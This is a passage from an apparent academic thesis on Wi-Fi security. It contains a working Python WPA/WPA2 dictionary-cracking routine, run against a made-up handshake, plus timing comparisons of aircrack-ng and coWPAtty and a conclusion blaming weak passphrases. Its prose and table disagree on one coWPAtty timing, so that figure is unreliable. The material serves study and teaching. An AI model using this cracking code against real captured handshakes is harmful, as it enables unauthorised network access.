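    """What the attacker recovers from the capture: SSID, both MACs, both nonces, message 2 with MIC."""
    ssid: str
    ap_mac: bytes
    sta_mac: bytes
    anonce: bytes
    snonce: bytes
    eapol: bytes

    @property
    def mic(self) -> bytes:
        return self.eapol[EAPOL_MIC_OFFSET:EAPOL_MIC_OFFSET + 16]


def make_handshake(ssid: str, passphrase: str) -> Handshake:
    """Constructed stand-in for Wind_Wi_Fi-01.cap: made-up fixed MACs and nonces, MIC from the true PMK."""
    ap_mac, sta_mac = bytes.fromhex("00112233aabb"), bytes.fromhex("66778899ccdd")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    mic = eapol_mic(kck, build_msg2(snonce))
    return Handshake(ssid, ap_mac, sta_mac, anonce, snonce, build_msg2(snonce, mic))


def precompute_pmks(ssid: str, wordlist: Iterable[str]) -> Dict[str, bytes]:
    """genpmk / airolib-ng --batch equivalent: the expensive PBKDF2 step, done once per SSID."""
    return {w: pmk_from_passphrase(w, ssid) for w in wordlist if 8 <= len(w) <= 63}


def crack(hs: Handshake, wordlist: Iterable[str],
          pmk_table: Optional[Dict[str, bytes]] = None) -> Optional[str]:
    """Dictionary attack: return the candidate whose KCK reproduces the captured MIC, else None.
    With pmk_table only the cheap PRF + HMAC remain per candidate, which is the speed-up in Table 3."""
    for word in wordlist:
        if not 8 <= len(word) <= 63:          # WPA passphrases are 8..63 characters; tools skip others
            continue
        pmk = pmk_table.get(word) if pmk_table is not None else pmk_from_passphrase(word, hs.ssid)
        if pmk is None:
            continue
        kck = ptk_from_pmk(pmk, hs.ap_mac, hs.sta_mac, hs.anonce, hs.snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, hs.eapol), hs.mic):
            return word
    return None


def known_vector_ok() -> bool:
    """IEEE 802.11i Annex test vector: passphrase "password", SSID "IEEE"."""
    expected = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"
    return pmk_from_passphrase("password", "IEEE").hex() == expected


if __name__ == "__main__":
    words = ["letmein", "password", "Wind2015!", "correct horse battery"]   # constructed wordlist
    hs = make_handshake("Wind_Wi_Fi", "Wind2015!")                          # made-up passphrase
    print("dictionary attack      :", crack(hs, words))
    print("precomputed, same SSID :", crack(hs, words, precompute_pmks("Wind_Wi_Fi", words)))
    print("precomputed, other SSID:", crack(hs, words, precompute_pmks("Other_AP", words)))
```

Run as a script, the first two lines print the made-up passphrase and the third prints None: the
table built for “Other_AP” holds PMKs derived with the wrong salt, so no candidate reproduces the
MIC. The cost split is visible in the code as well: every call to pmk_from_passphrase is 4096 HMAC
rounds, whereas the per-candidate work in crack() with a table is four HMACs for the PTK plus one
for the MIC, which is why the pre-computed attacks in Table 3 run two orders of magnitude faster.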

5.9. Comparison of attacks

To attack the wireless network “Wind_Wi_Fi” a dictionary of 2.804.985 words (26.9 MB) was used. The
key phrase is located at line 1.121.984, so the cracking program had to work through about 40% of the
dictionary before finding it. The following table shows the results of the attacks. The column Software
gives the application used for each attack, the column Time (s) the duration of the attack in seconds,
the column Keys/s the rate at which candidate keys were tested, and the column Pre-calculation time (s)
the time, in seconds, that “airolib-ng” and “genpmk” needed to create the hash files.

Software                                          Time (s)   Keys/s       Pre-calculation time (s)
aircrack-ng (dictionary)                          715        1.181,71     -
airolib-ng & aircrack-ng (pre-computed hashes)    17         46.856,72    11.516
coWPAtty (dictionary)                             4.346,01   190,25       -
genpmk & coWPAtty (pre-computed hashes)           6,44       128.357,58   10.671,54

Table 3: Comparative table of the results of the attacks used in this project

Comparing the attacks by execution time, we observe that the longest was the “coWPAtty” dictionary
attack, given in the text as 2.764,63 s, i.e. about 45 min (Table 3 and Graph 3 record 4.346,01 s,
about 72 min), while the shortest was also performed with “coWPAtty”, in combination with “genpmk”
(the pre-computed-hash attack), at only 6,44 s.

Graph 3: Time taken to crack WPA/WPA2 (seconds). Bars: aircrack-ng (dictionary) 715; airolib-ng &
aircrack-ng (pre-computed hashes) 17; coWPAtty (dictionary) 4.346,01; genpmk & coWPAtty
(pre-computed hashes) 7 (6,44 rounded).

Comparing the two dictionary attacks in particular, “Aircrack-ng” completed the attack in 715 s, about
12 min, whereas “coWPAtty”, as mentioned above, took approximately 45 min.

Graph 4: Time taken to crack WPA/WPA2 via dictionary attack (seconds). Bars: aircrack-ng (dictionary)
715; coWPAtty (dictionary) 4.346,01.


The pre-calculated-hash attacks execute faster, but they need considerable preparation time. “genpmk”
took 10.671,54 s, about 3 hr, to create its hash file, while “airolib-ng” needed 11.516 s, about 3 hr
and 20 min.

Graph 5: Time to pre-calculate the hashes (seconds). Bars: airolib-ng & aircrack-ng (pre-computed
hashes) 11.516; genpmk & coWPAtty (pre-computed hashes) 10.671.


The tools that use hash files take longer to prepare, but the attack itself is much faster:
“aircrack-ng” with “airolib-ng” took 17 s, while “coWPAtty” with “genpmk” needed just 6,44 s.

Graph 6: Time taken to crack WPA/WPA2 via pre-calculated hashes (seconds). Bars: airolib-ng &
aircrack-ng (pre-computed hashes) 17; genpmk & coWPAtty (pre-computed hashes) 7 (6,44 rounded).

In conclusion, “Aircrack-ng” is the better choice for a dictionary attack, while “genpmk” & “coWPAtty”
is the better choice for pre-computed hashes. The preparation time has to be counted, however: a hash
file is only worthwhile if the same SSID is attacked repeatedly. From the figures in Table 3, the
“genpmk” table (10.671,54 s) pays for itself from the third attack on the same SSID compared with a
plain “coWPAtty” dictionary run (4.346,01 s per attack), and the “airolib-ng” database (11.516 s) only
from the seventeenth attack compared with a plain “aircrack-ng” run (715 s). Against a single target
with a unique SSID, the dictionary attack is the faster route.

CONCLUSIONS

This thesis gave a general overview of some attacks that break the security of wireless networks.
Wireless LANs, because of the advantages they offer, are widely accepted by consumers and are spreading
rapidly. However, the main issue that concerns everyone engaged in their development is security.
To improve the security of wireless networks, encryption protocols were introduced, but these also have
weaknesses. The WEP protocol appeared first and revealed many security gaps; despite all the
improvements, WEP never qualified as a secure protocol. A new, more effective solution was proposed in
the 802.11i standard: the WPA protocol and, in its final form, WPA2, which achieves greater security.
Developed to address and correct the deficiencies of WEP, WPA2 uses the CCMP encryption algorithm, which
provides confidentiality, authentication, integrity and protection against replayed packets. Attacks on
networks protected with WEP and WPA/WPA2 have been automated in tool suites such as Aircrack-ng, so
anyone with a modern computer and a basic understanding of computing can carry them out. As the
experiments in Chapter 5 show, WPA2 itself was not broken: the key was recovered because the
pre-shared key was a word in a dictionary. Even a well-designed security mechanism becomes weak if its
users do not know how to deploy it properly.

BIBLIOGRAPHY
• Vijay K. Garg, 2007, Wireless Communications & Networking, University of Illinois, Chicago, USA.
• William Stallings, 2004, Wireless Communications & Networks, 2nd edition, Pearson Prentice Hall, USA.
• B. P. Crow, I. Widjaja, J. G. Kim and P. Sakai, 1997, Investigation of the IEEE 802.11 Medium Access
  Control (MAC) Sublayer Functions, Dept. of Electrical & Computer Engineering, University of Arizona,
  Tucson, AZ.
• Johnny Cache, Joshua Wright and Vincent Liu, 2010, Hacking Exposed Wireless: Wireless Security Secrets
  & Solutions, 2nd edition, McGraw-Hill, USA.
• A. K. M. Nazmus Sakib, Fariha Tasmin Jaigirdar, Muntasim Munim and Armin Akter, 2011, Security
  Improvement of WPA 2, Global Journals Inc., USA.
• A. Habibi Lashkari, Mir Mohammad Seyed Danesh and Behrang Samadi, 2009, A Survey on Wireless Security
  Protocols, IEEE, Beijing.
• P. Arana, 2006, Benefits and Vulnerabilities of Wi-Fi Protected Access 2 (WPA2), INFS.
• J. Korhonen, 1999, HiperLAN/2, Department of Computer Science and Engineering, Helsinki.
• M. Papadopoulos, 2006, Wardriving, Warchalking & Wireless Hacking, 2nd National Conference, Athens.
• T. Hassinen, 2006, Overview of WLAN Security, Helsinki University of Technology, TKK T-110.5290
  Seminar on Network Security.
• Wigle Tools, available from: https://wigle.net/tools [accessed 10 September 2015].
• Standards & Initiatives, available from: http://www.intel.com [accessed 13 July 2015].
• IEEE Standards Association, available from: http://standards.ieee.org [accessed 13 July 2015].
• Wikipedia, the free encyclopedia, available from: https://en.wikipedia.org/ [accessed 13 September
  2015].
• Security & hacking tools, available from: http://tools.securitytube.net [accessed 4 August 2015].
• Aircrack-ng, available from: http://www.aircrack-ng.org [accessed 19 September 2015].
